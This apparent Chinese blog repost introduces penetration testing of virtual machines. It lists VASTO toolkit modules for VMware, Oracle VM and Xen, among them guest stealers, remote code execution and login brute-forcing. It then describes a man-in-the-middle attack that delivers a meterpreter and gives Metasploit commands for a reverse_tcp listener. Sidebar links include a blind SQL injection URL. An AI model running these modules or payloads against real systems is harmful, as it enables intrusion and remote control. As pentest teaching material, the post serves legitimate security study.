针对虚拟机的渗透测试

最新推荐文章于 2024-05-06 22:42:57 发布
最新推荐文章于 2024-05-06 22:42:57 发布
阅读量774 收藏 1
点赞数
文章标签: 运维 数据库 操作系统
原文链接:https://yq.aliyun.com/articles/131255
版权

如今虚拟化在各个企业中应用的越来越多,且火热的云计算也依托于此技术。虚拟化技术确实能够使物理资源的利用更加灵活和便捷,那么虚拟机的安全性如何?相比传统架构,是否像传说中的一样安全?

  什么是虚拟化

  虚拟化是指计算机元件在虚拟的基础上而不是真实的基础上运行。虚拟化技术可以扩大硬件的容量,简化软件的重新配置过程。CPU的虚拟化技术可以单CPU模拟多CPU并行,允许一个平台同时运行多个操作系统,并且应用程序都可以在相互独立的空间内运行而互不影响,从而显著提高计算机的工作效率。我们先来看看虚拟机的层次结构图。

  虚拟机完全独立于其底层物理硬件。 例如,你可以为虚拟机配置与底层硬件上存在的物理组件完全不同的虚拟组件(例如,CPU、网卡、SCSI 控制器)。 同一物理服务器上的各个虚拟机甚至可以运行不同类型的操作系统(WindowsLinux 等)

  针对虚拟机的渗透测试

  VASTO是一个专用的虚拟机渗透测试工具,支持VMware, Oracle和Xen,可以与神器Metasploit有很好的结合。使用前需要先解压,然后复制metasploit文件夹下中

  VASTO的主要模块如下,功能还是比较强大的

  abiquo_guest_stealer – Abiquo guest stealer
abiquo_poison – Abiquo poison
eucalyptus_bouncer – Eucalyptus Bouncer
eucalyptus_poison – Eucalyptus Poison
oraclevm_oravma_fileread – Oracle VM agent remote code execution
vmware_autopwner – VMautopwn
vmware_guest_stealer – VMware Guest Stealer
vmware_login – VMware Login check scanner
vmware_session_rider – VMware Session Rider
vmware_studio_upload – VMware Studio<2.0.0.946-172280 Remote Code Execution
vmware_updatemanager_traversal – Update manager path traversal
vmware_version – VMware products fingerprintervmware_vilurker – VIlurker VIclient attack
vmware_webaccess_portscan – VMware Web Access Relay Port Scanner
xen_login – Xen Login Check Scanner
oracle_oravma_exec – Oracle VM agent remote code execution
vmware_sfcbd_exec - VMware VAMI-sfcbd remote code exec
vmware_tomcat_killer – VMware tomcat killer
Versionsscanner Modul:

  用于判断VM的版本等信息



 Login Scanner Modul:

  这个模块可以使用字典尝试暴力登录虚拟机

  vilurker module

  这个模块原理即利用ettercap等进行中间人攻击,欺骗成功后,当被攻击者(client)访问server时会弹出窗体,若点击即反弹一个meterpreter。

  先multi/handler监听

  msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST <Local Host IP here>
msf exploit(handler) > exploit

  欺骗过程如下

  返回shell(meterpreter)








====================================分割线================================



最新内容请见作者的GitHub页:http://qaseven.github.io/

weixin_34381687
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web渗透——虚拟机上网
weixin_44321116的博客
08-28 265
一台可以上网的真机,一台普通的虚拟机 xp网络修改成自动获取,然后在cmd中先清除缓存再测试
关于VMware中创建虚拟机的奇怪问题|基于Sparta的网络渗透测试实验
wicken_chen
04-12 917
写在开头 这篇文章主要是对自己的学习进行记录与回顾,若有错误请广大朋友指出! 我在安全技术领域做了一个基础测试实验——虚拟环境下对一个网络基础设施渗透测试工具(Sparta>>Legion)的应用。 本文中罗列的问题是我在安装途中所碰到的,甚是迷惑。 材料 1. VMware Workstation Player 15; 2. Kali Linux 2020.1b I...
2024年网络安全最全【网络安全】渗透测试入门与Kali Linux系统虚拟机安装,我在美团网络安全研发岗工作的那5年
最新发布
2401_84263434的博客
05-06 795
为了帮助大家更好的学习网络安全,我给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包,可以点击免费领取(如遇扫码问题,可以在评论区留言领取哦)~当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
虚拟机服务器渗透,对一台虚拟主机服务器的渗透 -电脑资料
weixin_28862561的博客
08-12 469
前几天听一树说了惊云下载系统的漏洞问题文件出在admin/user.asp提交http://www.xxx.com/down/admin/user.asp?user=admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1就相当于:select * from UserInfo where user=’admin’ and asc(mid(pwd,1,1))>...
渗透测试入门基础与Kali Linux系统虚拟机安装
m0_65364832的博客
01-15 1271
Kali Linux是基于Debian的linux发行版,包括很多的安全和取证方面的相关工具。它是由Offensive Security Ltd维护和资助。最先由Offensive Security的MatiAharoni和Devon Kearns通过重写Back Track来完成。Back Track是基于Ubuntu的linux发行版。
VMware虚拟机搭建渗透网络及原理解析
superprintf的博客
11-18 3872
这篇文章的写作顺序: 1.先熟悉VMware三种模式 本人是MacBook,如果你是windows电脑可以参考 https://blog.csdn.net/weixin_42442713/article/details/80903173 2.实验VMware三种模式 3.按照metasploit魔鬼训练营中的环境搭建网络(一个小公司网路模型) //# vmware网络配置的进阶请参照官网教程 //# https://docs.vmware.com/cn/VMware-Workstation-Pro/inde
web渗透测试靶机(新手)
05-07
"626包厢"可能是一个虚拟机或靶场环境的名字,其中包含了多个Web应用程序,用于实践SQL注入、跨站脚本(XSS)、文件包含、命令注入等常见的渗透测试技术。这个环境可以帮助新手了解如何利用这些漏洞,并学习如何防止...
30 天渗透测试练习2.pdf
10-06
6. **Matrix-Breakout 2: Morpheus** 和其他VulnHub挑战:这些是虚拟机环境,为学习者提供实际的渗透测试实践平台,模拟真实世界的网络环境。 7. **HackTheBox (HTB) 机器**:HTB是一个在线平台,提供了多种级别的...
Android APP渗透测试方法大全.pdf
07-30
【Android APP 渗透测试方法】是针对安卓应用程序进行安全评估的一种重要手段,旨在发现潜在的安全漏洞和风险,确保用户数据和系统安全。本篇文档详细介绍了渗透测试的方法和工具,适合不同层次的读者学习。 1. **...
新手指南:手把手教你如何搭建自己的渗透测试环境1
08-08
请注意,进行渗透测试时应始终遵守法规,仅在自己的环境中进行实验,且不应针对未经授权的目标进行测试。此外,定期更新和升级你的虚拟环境,以保持对最新威胁的了解。通过不断学习和实践,你将能够成为一名合格的白...
译 Kali Linux Web 无线渗透测试入门指南 中文版.rar
07-12
本教程基于Kali Linux专门讲解针对无线网络WiFi如何进行渗透测试。其中,详细揭示了无线网络的各种安全缺陷和容易被利用的漏洞。 第1章 搭建渗透测试环境 1 1.1 什么是渗透测试 1 1.2 安装Kali Linux操作系统 2 ...
web渗透测试详细入门实践课程-kali/sql注入
05-15
web渗透测试/渗透工具kali 渗透原理 渗透前期(网络踩点、网络扫描、网络查点) 渗透中期(利用漏洞信息进行渗透攻击、获取权限) 渗透后期(后渗透维持攻击、文件拷贝、代码植入、痕迹擦除) 渗透测试定义 渗透测试就是一种模拟恶意攻击者的技术与方法,挫败目标系统安全控制措施,取得访问控制权,并发现具备业务影响后果安全隐患的一种安全测试与评估方式。 本课程主要从渗透测试流程、情报收集流程、渗透测试metaspolit终端介绍、nmap扫描、文件包含漏洞、文件上传漏洞、sql注入等方面理论加实操web渗透测试详细专业技术知识。购买课程的同学可以获取价值200的教学资源包:包括虚拟机环境搭建的镜像、丰富的网络安全工具安装包和组网工具安装包等
通过虚拟机搭建内网渗透测试环境
sinat_41880528的博客
05-07 5709
渗透测试相关课题,第一步就是要搭建内网渗透测试环境啦,我的环境早已搭建好,在这里不能复现搭建具体的渗透测试过程,主要是分享个人在搭建时用到的一些参考资料和分享安装包。一、内网测试环境的网络拓扑二、需要的设备和安装包个人笔记本电脑、虚拟机安装包、win7安装包、Kali安装包(关于Windows操作系统的版本根据个人需求,大多数是XP或是Win7,和我一样想复现Ms17_010的可以用我下面分享的...
基于VMWare搭建渗透测试环境(含内内网主机)
bitsec的专栏
11-03 3535
基于VMWare搭建渗透测试环境(含内内网主机)网络拓扑VMWare虚拟机网络设置KALI主机配置目标机设置vim /etc/network/interfaces内网主机配置vim /etc/network/interfaces 网络拓扑 VMWare虚拟机网络设置 NAT 模式:10.10.10.0/24 ![在这里插入图片描述](https:/...
渗透测试-Kali虚拟机技术
道阻且长,行则将至。
02-27 5725
网络配置 常用的虚拟机软件有VMware workstations和VirtualBox等,在使用虚拟机时,很VMware的网络连接问题十分基础而关键。本文介绍下关于VMware workstations网络连接的三种模式。 工作模式 网卡 介绍 Host-Only(仅主机模式) VMnet1表示用于仅主机模式下的虚拟交换机 虚拟机只能与主机构成内部通信,无法对外网进行访问 B...
谁来教我渗透测试——VMware工具安装和使用
菜鸟小白的学习分享
07-26 233
今天我们继续渗透测试学习系列了,昨天我们看了基础概念,今天我们来学习一下渗透测试必备的功能VMware安装。 首先我们下载好VMware workstation Pro的安装包。可以在百度上直接百度下载,也可以直接公众号私信“VMware安装包”获取安装包和注册码。 安装VMware 下载好了之后我们直接双击EXE程序允许。 勾选我接受协议,然后点击下一步。 直接点击下一步,有需要的小伙伴可以更改安装位置 可以直接点击下一步 点击下一步 点击“安装” 静静等待安装完成 安装完成后我们可以点击完
涉密服务器虚拟化软件,虚拟化软件解决方案
weixin_30596433的博客
08-03 1062
1.背景随着涉密行业信息化建设和IT业务的快速增长,涉密行业传统信息化建设中对于服务器应用面临着如下困境:资源利用率低:传统服务器应用部署模式采用“烟囱式”架构,单个应用独享整个服务器资源,资源利用率低。业务上线周期长:新增业务时,需要重新采购硬件、业务部署,一般耗费数周甚至数月时间。故障恢复时间长:服务器应用独立部署,当出现故障需要更换硬件时,需要重新部署软件和应用,耗时较长。系统可靠性差:由于...
Kali Linux 渗透测试系统的安装及初始配置
郑哥哥の博客
09-06 4685
Kali Linux 渗透测试系统的安装及初始配置 1、Kali Linux简介 Kali Linux 是一个基于 Debian 的 Linux 发行版,旨在进行高级渗透测试和安全审计。Kali Linux 包含数百种工具,适用于各种信息安全任务,如渗透测试,安全研究,计算机取证和逆向工程。Kali Linux 由公司 Offensive Security 开发,资助和维护。 Kali 的优势和特性: 1、包括 900 多种渗透测试工具 2、免费:完全免费且永远都是 3、开源:所有进入 Kali
【信息收集】——6、目录扫描字典收集
Fly_鹏程万里
02-28 7377
前言要想正式开始渗透测试,那么就少不了一个较好的实验环境。为了避免在本地物理主机上做实验引起电脑病毒或者引起系统的奔溃问题,我们选择使用VMware Workstations这一款软件来进行搭建虚拟环境,并且在其中安装需要使用的操作系统。准备(1)运行内存为8G或者8G以上的物理主机(2)VMware Workstations 12 (链接:https://pan.baidu.com/s/1rak...
OSCP渗透测试实战:VulnHub精选漏洞机器
Sky虽然没有具体链接,但推测它可能是Vulnhub上的一个项目,可能是针对特定技术栈或环境的高级渗透测试机器。这些资源不仅帮助准备参加 Offensive Security Professional (OSCP) 类似的认证考试,也适合任何人希望...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值